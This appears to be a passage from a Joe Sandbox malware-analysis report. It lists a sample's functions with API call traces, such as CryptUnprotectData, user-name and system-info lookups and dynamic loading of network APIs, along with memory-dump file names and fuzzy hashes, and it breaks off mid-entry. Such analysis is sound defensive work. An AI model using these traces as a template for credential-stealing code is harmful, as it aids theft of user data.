Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 4d46869fabec53b7a0f5b2d57604ca2907a5efa1a393530b1e21e16dd2f56145
Instruction ID: 31f1cfe6639407bdfb0ecce6b425ad2bd9367ad53aed2176816a95a2827101d3
Opcode Fuzzy Hash: 4d46869fabec53b7a0f5b2d57604ca2907a5efa1a393530b1e21e16dd2f56145
Instruction Fuzzy Hash: 9411ADB1E05218EBEB20CB54DC49FAABB7CFB05721F104399F90A932D0C7745A44CB91

Function 00189BB0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00189BD4
LocalAlloc.KERNEL32(00000040,00000000), ref: 00189BF3
LocalFree.KERNEL32(?), ref: 00189C23

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 774dca8bb8a3ada7ecc0ba96cce6e23bbcd7856aa490c061afb6f3455b5465a9
Instruction ID: 1226315593769911a9f9662640c2279036b360f6b0ebf95c9b41ac4186b37f11
Opcode Fuzzy Hash: 774dca8bb8a3ada7ecc0ba96cce6e23bbcd7856aa490c061afb6f3455b5465a9
Instruction Fuzzy Hash: 1011C9B8A00209EFCB05DF94D985AAEB7B9FF89300F104558ED15A7350D730AE51CF61

Function 001972F0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197320
RtlAllocateHeap.NTDLL(00000000), ref: 00197327
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0019733F

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: a825175ecfc65cadaca6decbcf3cb44d93e6599661327ae4a0d96f350022784f
Instruction ID: 663ecfc720d916b247909c1345370a43b10e26ab14500e9e2e6d2d0a810f38c2
Opcode Fuzzy Hash: a825175ecfc65cadaca6decbcf3cb44d93e6599661327ae4a0d96f350022784f
Instruction Fuzzy Hash: FEF062B1954248EFCB04DF98DD46BAEFBBCFB05B21F10021AFA05A3680C7745504CBA1

Function 00197970 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(001A0DFC), ref: 001979A0
wsprintfA.USER32 ref: 001979B6

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: d6a84a3528d7eb077f8e031c3181a99c0e0c4370448cc190c7fc2752d83d50af
Instruction ID: 600031a49efa90c8f8f282b39bcbd19f86d1ce4c0a638c319aa4270e519ad05e
Opcode Fuzzy Hash: d6a84a3528d7eb077f8e031c3181a99c0e0c4370448cc190c7fc2752d83d50af
Instruction Fuzzy Hash: 54F090B2914218EBCB14CF88ED45FAAFBBCFB49B24F404669F505A3280D7756904CBA0

Function 001995E0 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,01396280), ref: 001995FD
GetProcAddress.KERNEL32(75900000,01396600), ref: 00199615
GetProcAddress.KERNEL32(75900000,013A8F10), ref: 0019962E
GetProcAddress.KERNEL32(75900000,013A8F70), ref: 00199646
GetProcAddress.KERNEL32(75900000,013ACE10), ref: 0019965E
GetProcAddress.KERNEL32(75900000,013ACFC0), ref: 00199677
GetProcAddress.KERNEL32(75900000,0139B1F8), ref: 0019968F
GetProcAddress.KERNEL32(75900000,013ACE28), ref: 001996A7
GetProcAddress.KERNEL32(75900000,013ACE70), ref: 001996C0
GetProcAddress.KERNEL32(75900000,013ACEA0), ref: 001996D8
GetProcAddress.KERNEL32(75900000,013ACF60), ref: 001996F0
GetProcAddress.KERNEL32(75900000,01396580), ref: 00199709
GetProcAddress.KERNEL32(75900000,01396400), ref: 00199721
GetProcAddress.KERNEL32(75900000,013962A0), ref: 00199739
GetProcAddress.KERNEL32(75900000,013965E0), ref: 00199752
GetProcAddress.KERNEL32(75900000,013ACEB8), ref: 0019976A
GetProcAddress.KERNEL32(75900000,013ACED0), ref: 00199782
GetProcAddress.KERNEL32(75900000,0139B068), ref: 0019979B
GetProcAddress.KERNEL32(75900000,01396520), ref: 001997B3
GetProcAddress.KERNEL32(75900000,013ACF18), ref: 001997CB
GetProcAddress.KERNEL32(75900000,013ACF78), ref: 001997E4
GetProcAddress.KERNEL32(75900000,013ACE88), ref: 001997FC
GetProcAddress.KERNEL32(75900000,013ACF90), ref: 00199814
GetProcAddress.KERNEL32(75900000,01396300), ref: 0019982D
GetProcAddress.KERNEL32(75900000,013ACE40), ref: 00199845
GetProcAddress.KERNEL32(75900000,013ACFA8), ref: 0019985D
GetProcAddress.KERNEL32(75900000,013ACEE8), ref: 00199876
GetProcAddress.KERNEL32(75900000,013ACE58), ref: 0019988E
GetProcAddress.KERNEL32(75900000,013ACF30), ref: 001998A6
GetProcAddress.KERNEL32(75900000,013ACF00), ref: 001998BF
GetProcAddress.KERNEL32(75900000,013ACF48), ref: 001998D7
GetProcAddress.KERNEL32(75900000,013AC9A8), ref: 001998EF
GetProcAddress.KERNEL32(75900000,013ACA80), ref: 00199908
GetProcAddress.KERNEL32(75900000,013A9DB8), ref: 00199920
GetProcAddress.KERNEL32(75900000,013AC870), ref: 00199938
GetProcAddress.KERNEL32(75900000,013AC8D0), ref: 00199951
GetProcAddress.KERNEL32(75900000,01396540), ref: 00199969
GetProcAddress.KERNEL32(75900000,013AC918), ref: 00199981
GetProcAddress.KERNEL32(75900000,013963E0), ref: 0019999A
GetProcAddress.KERNEL32(75900000,013AC9F0), ref: 001999B2
GetProcAddress.KERNEL32(75900000,013AC828), ref: 001999CA
GetProcAddress.KERNEL32(75900000,013965A0), ref: 001999E3
GetProcAddress.KERNEL32(75900000,01396420), ref: 001999FB
LoadLibraryA.KERNEL32(013ACA20,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A0D
LoadLibraryA.KERNEL32(013AC900,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A1E
LoadLibraryA.KERNEL32(013AC9C0,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A30
LoadLibraryA.KERNEL32(013AC840,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A42
LoadLibraryA.KERNEL32(013ACAE0,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A53
LoadLibraryA.KERNEL32(013AC960,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A65
LoadLibraryA.KERNEL32(013AC978,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A77
LoadLibraryA.KERNEL32(013ACAC8,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A88
GetProcAddress.KERNEL32(75FD0000,01396840), ref: 00199AAA
GetProcAddress.KERNEL32(75FD0000,013AC888), ref: 00199AC2
GetProcAddress.KERNEL32(75FD0000,013A8AC0), ref: 00199ADA
GetProcAddress.KERNEL32(75FD0000,013AC858), ref: 00199AF3
GetProcAddress.KERNEL32(75FD0000,01396700), ref: 00199B0B
GetProcAddress.KERNEL32(734B0000,0139B220), ref: 00199B30
GetProcAddress.KERNEL32(734B0000,013969E0), ref: 00199B49
GetProcAddress.KERNEL32(734B0000,0139B298), ref: 00199B61
GetProcAddress.KERNEL32(734B0000,013AC990), ref: 00199B79
GetProcAddress.KERNEL32(734B0000,013AC8A0), ref: 00199B92
GetProcAddress.KERNEL32(734B0000,013966C0), ref: 00199BAA
GetProcAddress.KERNEL32(734B0000,01396740), ref: 00199BC2
GetProcAddress.KERNEL32(734B0000,013AC8B8), ref: 00199BDB
GetProcAddress.KERNEL32(763B0000,01396860), ref: 00199BFC
GetProcAddress.KERNEL32(763B0000,01396940), ref: 00199C14
GetProcAddress.KERNEL32(763B0000,013ACA08), ref: 00199C2D
GetProcAddress.KERNEL32(763B0000,013ACAB0), ref: 00199C45
GetProcAddress.KERNEL32(763B0000,01396760), ref: 00199C5D
GetProcAddress.KERNEL32(750F0000,0139B2C0), ref: 00199C83
GetProcAddress.KERNEL32(750F0000,0139B310), ref: 00199C9B
GetProcAddress.KERNEL32(750F0000,013AC9D8), ref: 00199CB3
GetProcAddress.KERNEL32(750F0000,01396960), ref: 00199CCC
GetProcAddress.KERNEL32(750F0000,013967A0), ref: 00199CE4
GetProcAddress.KERNEL32(750F0000,0139B018), ref: 00199CFC
GetProcAddress.KERNEL32(75A50000,013ACA38), ref: 00199D22
GetProcAddress.KERNEL32(75A50000,013966A0), ref: 00199D3A
GetProcAddress.KERNEL32(75A50000,013A8B10), ref: 00199D52
GetProcAddress.KERNEL32(75A50000,013AC8E8), ref: 00199D6B
GetProcAddress.KERNEL32(75A50000,013ACA50), ref: 00199D83
GetProcAddress.KERNEL32(75A50000,01396680), ref: 00199D9B
GetProcAddress.KERNEL32(75A50000,01396780), ref: 00199DB4
GetProcAddress.KERNEL32(75A50000,013ACA68), ref: 00199DCC
GetProcAddress.KERNEL32(75A50000,013ACA98), ref: 00199DE4
GetProcAddress.KERNEL32(75070000,013966E0), ref: 00199E06
GetProcAddress.KERNEL32(75070000,013ACAF8), ref: 00199E1E
GetProcAddress.KERNEL32(75070000,013AC930), ref: 00199E36
GetProcAddress.KERNEL32(75070000,013AC810), ref: 00199E4F
GetProcAddress.KERNEL32(75070000,013AC948), ref: 00199E67
GetProcAddress.KERNEL32(74E50000,01396720), ref: 00199E88
GetProcAddress.KERNEL32(74E50000,013969A0), ref: 00199EA1
GetProcAddress.KERNEL32(75320000,01396800), ref: 00199EC2
GetProcAddress.KERNEL32(75320000,013ACC00), ref: 00199EDA
GetProcAddress.KERNEL32(6F2C0000,01396980), ref: 00199F00
GetProcAddress.KERNEL32(6F2C0000,01396A00), ref: 00199F18
GetProcAddress.KERNEL32(6F2C0000,013967C0), ref: 00199F30
GetProcAddress.KERNEL32(6F2C0000,013ACDF8), ref: 00199F49
GetProcAddress.KERNEL32(6F2C0000,013967E0), ref: 00199F61
GetProcAddress.KERNEL32(6F2C0000,01396820), ref: 00199F79
GetProcAddress.KERNEL32(6F2C0000,013968E0), ref: 00199F92
GetProcAddress.KERNEL32(6F2C0000,01396880), ref: 00199FAA
GetProcAddress.KERNEL32(6F2C0000,InternetSetOptionA), ref: 00199FC1
GetProcAddress.KERNEL32(6F2C0000,HttpQueryInfoA), ref: 00199FD7
GetProcAddress.KERNEL32(74E00000,013ACDB0), ref: 00199FF9
GetProcAddress.KERNEL32(74E00000,013A8A20), ref: 0019A011
GetProcAddress.KERNEL32(74E00000,013ACCD8), ref: 0019A029
GetProcAddress.KERNEL32(74E00000,013ACC78), ref: 0019A042
GetProcAddress.KERNEL32(74DF0000,01396920), ref: 0019A063
GetProcAddress.KERNEL32(6FB80000,013ACBB8), ref: 0019A084
GetProcAddress.KERNEL32(6FB80000,013969C0), ref: 0019A09D
GetProcAddress.KERNEL32(6FB80000,013ACB58), ref: 0019A0B5
GetProcAddress.KERNEL32(6FB80000,013ACB10), ref: 0019A0CD

Strings

HttpQueryInfoA, xrefs: 00199FCC
InternetSetOptionA, xrefs: 00199FB5

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 5666fc30d7c2c4dc63df58e13f3f4be515952f5d610f520e13337c21b31b2d8a
Instruction ID: 47e15b8c4dac50c42bd1eb9545f33f0324768307cd0fa6c9850f133f365064d6
Opcode Fuzzy Hash: 5666fc30d7c2c4dc63df58e13f3f4be515952f5d610f520e13337c21b31b2d8a
Instruction Fuzzy Hash: 71624EB6520200EFC746DFA8EC88D1A3BBEB74E741F51A51AE60AC3674DB349841DF64

Function 00187750 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00187764
RtlAllocateHeap.NTDLL(00000000), ref: 0018776B
lstrcat.KERNEL32(?,013A94E8), ref: 0018791B
lstrcat.KERNEL32(?,?), ref: 0018792F
lstrcat.KERNEL32(?,?), ref: 00187943
lstrcat.KERNEL32(?,?), ref: 00187957
lstrcat.KERNEL32(?,013ADE98), ref: 0018796B
lstrcat.KERNEL32(?,013ADFB8), ref: 0018797F
lstrcat.KERNEL32(?,013ADF88), ref: 00187992
lstrcat.KERNEL32(?,013ADEF8), ref: 001879A6
lstrcat.KERNEL32(?,013ADFF8), ref: 001879BA
lstrcat.KERNEL32(?,?), ref: 001879CE
lstrcat.KERNEL32(?,?), ref: 001879E2
lstrcat.KERNEL32(?,?), ref: 001879F6
lstrcat.KERNEL32(?,013ADE98), ref: 00187A09
lstrcat.KERNEL32(?,013ADFB8), ref: 00187A1D
lstrcat.KERNEL32(?,013ADF88), ref: 00187A31
lstrcat.KERNEL32(?,013ADEF8), ref: 00187A44
lstrcat.KERNEL32(?,013AE060), ref: 00187A58
lstrcat.KERNEL32(?,?), ref: 00187A6C
lstrcat.KERNEL32(?,?), ref: 00187A80
lstrcat.KERNEL32(?,?), ref: 00187A94
lstrcat.KERNEL32(?,013ADE98), ref: 00187AA8
lstrcat.KERNEL32(?,013ADFB8), ref: 00187ABB
lstrcat.KERNEL32(?,013ADF88), ref: 00187ACF
lstrcat.KERNEL32(?,013ADEF8), ref: 00187AE3
lstrcat.KERNEL32(?,013AE0C8), ref: 00187AF6
lstrcat.KERNEL32(?,?), ref: 00187B0A
lstrcat.KERNEL32(?,?), ref: 00187B1E
lstrcat.KERNEL32(?,?), ref: 00187B32
lstrcat.KERNEL32(?,013ADE98), ref: 00187B46
lstrcat.KERNEL32(?,013ADFB8), ref: 00187B5A
lstrcat.KERNEL32(?,013ADF88), ref: 00187B6D
lstrcat.KERNEL32(?,013ADEF8), ref: 00187B81
lstrcat.KERNEL32(?,013AE130), ref: 00187B95
lstrcat.KERNEL32(?,?), ref: 00187BA9
lstrcat.KERNEL32(?,?), ref: 00187BBD
lstrcat.KERNEL32(?,?), ref: 00187BD1
lstrcat.KERNEL32(?,013ADE98), ref: 00187BE4
lstrcat.KERNEL32(?,013ADFB8), ref: 00187BF8
lstrcat.KERNEL32(?,013ADF88), ref: 00187C0C
lstrcat.KERNEL32(?,013ADEF8), ref: 00187C1F
lstrcat.KERNEL32(?,013AE198), ref: 00187C33
lstrcat.KERNEL32(?,?), ref: 00187C47
lstrcat.KERNEL32(?,?), ref: 00187C5B
lstrcat.KERNEL32(?,?), ref: 00187C6F
lstrcat.KERNEL32(?,013ADE98), ref: 00187C83
lstrcat.KERNEL32(?,013ADFB8), ref: 00187C96
lstrcat.KERNEL32(?,013ADF88), ref: 00187CAA
lstrcat.KERNEL32(?,013ADEF8), ref: 00187CBE

Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,001A17A0), ref: 00187646
Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,00000000), ref: 00187688
Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020, : ), ref: 0018769A
Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,00000000), ref: 001876CF
Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,001A17A8), ref: 001876E0
Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,00000000), ref: 00187713
Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,001A17AC), ref: 0018772D
Part of subcall function 00187610: task.LIBCPMTD ref: 0018773B

lstrcat.KERNEL32(?,013AE500), ref: 00187E4B
lstrcat.KERNEL32(?,013AD458), ref: 00187E5E
lstrlen.KERNEL32(35BFF020), ref: 00187E6B
lstrlen.KERNEL32(35BFF020), ref: 00187E7B

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 5a7459693fffa3f7446d43f787bc8f6441ae70124a7b559387520005633aed99
Instruction ID: 8712b1d80889f260bedee215cffc7d995c263c8d82192535a3920369e7ebf58e
Opcode Fuzzy Hash: 5a7459693fffa3f7446d43f787bc8f6441ae70124a7b559387520005633aed99
Instruction Fuzzy Hash: 283233B6910214ABCB15EBA0DC89DDE773CBB59700F444A99F20AA3090EF75E785CF64

Function 00190090 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

